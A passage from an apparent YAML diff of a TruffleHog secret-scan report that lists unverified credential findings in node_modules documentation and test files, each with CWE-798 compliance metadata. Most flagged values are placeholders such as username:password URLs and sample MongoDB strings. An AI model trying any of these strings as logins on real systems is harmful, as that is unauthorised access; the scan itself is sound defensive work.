+ - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 71285c8155080cef + ruleId: URI + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/faye-websocket/README.md + startLine: 0 + message: http://username:password@proxy.example.com + title: URI secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/faye-websocket/README.md + line: 122 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 17 + DetectorName: URI + DetectorDescription: This detector identifies URLs with embedded credentials, + which can be used to access web resources without explicit user interaction. + DecoderName: PLAIN + Verified: false + VerificationError: 'lookup proxy.example.com on 192.168.65.7:53: no such host' + VerificationFromCache: false + Raw: http://username:password@proxy.example.com + RawV2: http://username:password@proxy.example.com + Redacted: http://username:********@proxy.example.com + ExtraData: null + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: cf9d5ac0f2fa1e76 + ruleId: URI + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/firebase-admin/node_modules/@types/node/https.d.ts + startLine: 0 + message: https://abc:xyz@example.com + title: URI secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/firebase-admin/node_modules/@types/node/https.d.ts + line: 429 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 17 + DetectorName: URI + DetectorDescription: This detector identifies URLs with embedded credentials, + which can be used to access web resources without explicit user interaction. + DecoderName: PLAIN + Verified: false + VerificationFromCache: true + Raw: https://abc:xyz@example.com + RawV2: https://abc:xyz@example.com + Redacted: https://abc:********@example.com + ExtraData: null + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 40e557d25e059317 + ruleId: URI + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/firebase-admin/node_modules/@types/node/http.d.ts + startLine: 0 + message: http://abc:xyz@example.com + title: URI secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/firebase-admin/node_modules/@types/node/http.d.ts + line: 1817 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 17 + DetectorName: URI + DetectorDescription: This detector identifies URLs with embedded credentials, + which can be used to access web resources without explicit user interaction. + DecoderName: PLAIN + Verified: false + VerificationFromCache: true + Raw: http://abc:xyz@example.com + RawV2: http://abc:xyz@example.com + Redacted: http://abc:********@example.com + ExtraData: null + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 919e333a335f73d4 + ruleId: URI + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts + startLine: 0 + message: https://abc:xyz@example.com + title: URI secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts + line: 736 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 17 + DetectorName: URI + DetectorDescription: This detector identifies URLs with embedded credentials, + which can be used to access web resources without explicit user interaction. + DecoderName: ESCAPED_UNICODE + Verified: false + VerificationFromCache: true + Raw: https://abc:xyz@example.com + RawV2: https://abc:xyz@example.com + Redacted: https://abc:********@example.com + ExtraData: null + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: aa9f19a78a21fb70 + ruleId: URI + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts + startLine: 0 + message: https://123:xyz@example.com + title: URI secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts + line: 742 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 17 + DetectorName: URI + DetectorDescription: This detector identifies URLs with embedded credentials, + which can be used to access web resources without explicit user interaction. + DecoderName: PLAIN + Verified: false + VerificationFromCache: true + Raw: https://123:xyz@example.com + RawV2: https://123:xyz@example.com + Redacted: https://123:********@example.com + ExtraData: null + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6d8ae777484be698 + ruleId: URI + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts + startLine: 0 + message: https://abc:123@example.com + title: URI secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts + line: 577 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 17 + DetectorName: URI + DetectorDescription: This detector identifies URLs with embedded credentials, + which can be used to access web resources without explicit user interaction. + DecoderName: PLAIN + Verified: false + VerificationFromCache: true + Raw: https://abc:123@example.com + RawV2: https://abc:123@example.com + Redacted: https://abc:********@example.com + ExtraData: null + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 170043ac8ee06ba6 + ruleId: GCP + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/google-auth-library/README.md + startLine: 0 + message: your-client-email + title: GCP secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/google-auth-library/README.md + line: 323 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 6 + DetectorName: GCP + DetectorDescription: GCP (Google Cloud Platform) is a suite of cloud computing + services that runs on the same infrastructure that Google uses internally for + its end-user products. GCP keys can be used to access and manage these services. + DecoderName: PLAIN + Verified: false + VerificationError: 'private key should be a PEM or plain PKCS1 or PKCS8; parse + error: asn1: structure error: tags don''t match (16 vs {class:1 tag:25 length:111 + isCompound:true}) {optional:false explicit:false application:false private:false + defaultValue: tag: stringType:0 timeType:0 set:false omitEmpty:false} + pkcs1PrivateKey @2' + VerificationFromCache: false + Raw: your-client-email + RawV2: '{"type":"service_account","project_id":"your-project-id","private_key_id":"your-private-key-id","private_key":"your-private-key","client_email":"your-client-email","client_id":"your-client-id","auth_uri":"https://accounts.google.com/o/oauth2/auth","token_uri":"https://accounts.google.com/o/oauth2/token","auth_provider_x509_cert_url":"https://www.googleapis.com/oauth2/v1/certs","client_x509_cert_url":"your-cert-url"}' + Redacted: your-client-email + ExtraData: + private_key_id: your-private-key-id + project: your-project-id + rotation_guide: https://howtorotate.com/docs/tutorials/gcp/ + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d5d31157dd10c1ff + ruleId: Circle + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/ip-address/README.md + startLine: 0 + message: 7baede7efd3db5f1f25fb439e97d5f695ff76318 + title: Circle secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/ip-address/README.md + line: 1 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 4 + DetectorName: Circle + DetectorDescription: CircleCI is a continuous integration and delivery platform + used to build, test, and deploy software. CircleCI tokens can be used to interact + with the CircleCI API and access various resources and functionalities. + DecoderName: PLAIN + Verified: false + VerificationFromCache: false + Raw: 7baede7efd3db5f1f25fb439e97d5f695ff76318 + RawV2: '' + Redacted: '' + ExtraData: + Version: '1' + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7196c7e679641da3 + ruleId: MongoDB + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/prisma/build/index.js + startLine: 0 + message: mongodb+srv://root:randompassword@cluster0.ab1cd.mongodb.net/mydb?retryWrites=true&w=majority + title: MongoDB secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/prisma/build/index.js + line: 1568 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 895 + DetectorName: MongoDB + DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented + data model. MongoDB credentials can be used to access and manipulate the database. + DecoderName: PLAIN + Verified: false + VerificationError: 'lookup _mongodb._tcp.cluster0.ab1cd.mongodb.net on 192.168.65.7:53: + no such host' + VerificationFromCache: false + Raw: mongodb+srv://root:randompassword@cluster0.ab1cd.mongodb.net/mydb?retryWrites=true&w=majority + RawV2: '' + Redacted: '' + ExtraData: + rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f4471d3670e3b099 + ruleId: MongoDB + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/keyv/README.md + startLine: 0 + message: mongodb://user:pass@localhost:27017/dbname + title: MongoDB secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/keyv/README.md + line: 58 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 895 + DetectorName: MongoDB + DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented + data model. MongoDB credentials can be used to access and manipulate the database. + DecoderName: PLAIN + Verified: false + VerificationError: context deadline exceeded + VerificationFromCache: false + Raw: mongodb://user:pass@localhost:27017/dbname + RawV2: '' + Redacted: '' + ExtraData: + rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d837ea8fcf1f8062 + ruleId: URI + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/websocket-driver/README.md + startLine: 0 + message: http://username:password@proxy.example.com + title: URI secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/websocket-driver/README.md + line: 177 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 17 + DetectorName: URI + DetectorDescription: This detector identifies URLs with embedded credentials, + which can be used to access web resources without explicit user interaction. + DecoderName: PLAIN + Verified: false + VerificationError: 'lookup proxy.example.com on 192.168.65.7:53: no such host' + VerificationFromCache: true + Raw: http://username:password@proxy.example.com + RawV2: http://username:password@proxy.example.com + Redacted: http://username:********@proxy.example.com + ExtraData: null + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0a6439395ad23821 + ruleId: URI + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/zod/src/v4/classic/tests/string.test.ts + startLine: 0 + message: https://anonymous:flabada@developer.mozilla.org + title: URI secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/zod/src/v4/classic/tests/string.test.ts + line: 307 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 17 + DetectorName: URI + DetectorDescription: This detector identifies URLs with embedded credentials, + which can be used to access web resources without explicit user interaction. + DecoderName: PLAIN + Verified: false + VerificationFromCache: false + Raw: https://anonymous:flabada@developer.mozilla.org + RawV2: https://anonymous:flabada@developer.mozilla.org/en + Redacted: https://anonymous:********@developer.mozilla.org/en + ExtraData: null + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1dff4f66e83b2b09 + ruleId: Postgres + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/is-url/test/index.js + startLine: 0 + message: postgres://u:p@example.com:5702 + title: Postgres secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/is-url/test/index.js + line: 68 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 968 + DetectorName: Postgres + DetectorDescription: Postgres connection string containing credentials + DecoderName: PLAIN + Verified: false + VerificationError: i/o timeout + VerificationFromCache: false + Raw: postgres://u:p@example.com:5702 + RawV2: postgres://u:p@example.com:5702 + Redacted: '' + ExtraData: + sslmode: + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 849f8848e4b2049c + ruleId: GitHubOauth2 + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md + startLine: 0 + message: showCompletionScript + title: GitHubOauth2 secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md + line: 164 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 924 + DetectorName: GitHubOauth2 + DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize + applications to access GitHub's API on behalf of a user or organization. These + credentials include a client ID and client secret, which can be used to obtain + access tokens for accessing GitHub resources. + DecoderName: PLAIN + Verified: false + VerificationFromCache: false + Raw: showCompletionScript + RawV2: showCompletionScript027a6365b737e13116811a8ef43670196e1fa00a + Redacted: '' + ExtraData: + rotation_guide: https://howtorotate.com/docs/tutorials/github/ + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9afc5113c741a56f + ruleId: MongoDB + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts + startLine: 0 + message: mongodb://username:password@host:1234 + title: MongoDB secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts + line: 644 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 895 + DetectorName: MongoDB + DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented + data model. MongoDB credentials can be used to access and manipulate the database. + DecoderName: PLAIN + Verified: false + VerificationError: context deadline exceeded + VerificationFromCache: false + Raw: mongodb://username:password@host:1234 + RawV2: '' + Redacted: '' + ExtraData: + rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 917b9a33e85655cd + ruleId: MongoDB + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts + startLine: 0 + message: mongodb://username:password@host:1234/defaultauthdb + title: MongoDB secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts + line: 646 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 895 + DetectorName: MongoDB + DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented + data model. MongoDB credentials can be used to access and manipulate the database. + DecoderName: PLAIN + Verified: false + VerificationError: context deadline exceeded + VerificationFromCache: false + Raw: mongodb://username:password@host:1234/defaultauthdb + RawV2: '' + Redacted: '' + ExtraData: + rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 31f0bf34095c5b38 + ruleId: MongoDB + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts + startLine: 0 + message: mongodb://username:password@host:1234/defaultauthdb?authSource=admin + title: MongoDB secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts + line: 647 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 895 + DetectorName: MongoDB + DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented + data model. MongoDB credentials can be used to access and manipulate the database. + DecoderName: PLAIN + Verified: false + VerificationError: context deadline exceeded + VerificationFromCache: false + Raw: mongodb://username:password@host:1234/defaultauthdb?authSource=admin + RawV2: '' + Redacted: '' + ExtraData: + rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1dda63967d05f07b + ruleId: MongoDB + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts + startLine: 0 + message: mongodb://username:password@host:1234/defaultauthdb?authSource=admin&connectTimeoutMS=300000 + title: MongoDB secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts + line: 649 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 895 + DetectorName: MongoDB + DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented + data model. MongoDB credentials can be used to access and manipulate the database. + DecoderName: PLAIN + Verified: false + VerificationError: context deadline exceeded + VerificationFromCache: false + Raw: mongodb://username:password@host:1234/defaultauthdb?authSource=admin&connectTimeoutMS=300000 + RawV2: '' + Redacted: '' + ExtraData: + rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9491b5fd54f57cb2 + ruleId: MongoDB + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts + startLine: 0 + message: mongodb://username:password@host:1234/?authSource=admin + title: MongoDB secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts + line: 651 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 895 + DetectorName: MongoDB + DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented + data model. MongoDB credentials can be used to access and manipulate the database. + DecoderName: PLAIN + Verified: false + VerificationError: context deadline exceeded + VerificationFromCache: false + Raw: mongodb://username:password@host:1234/?authSource=admin + RawV2: '' + Redacted: '' + ExtraData: + rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 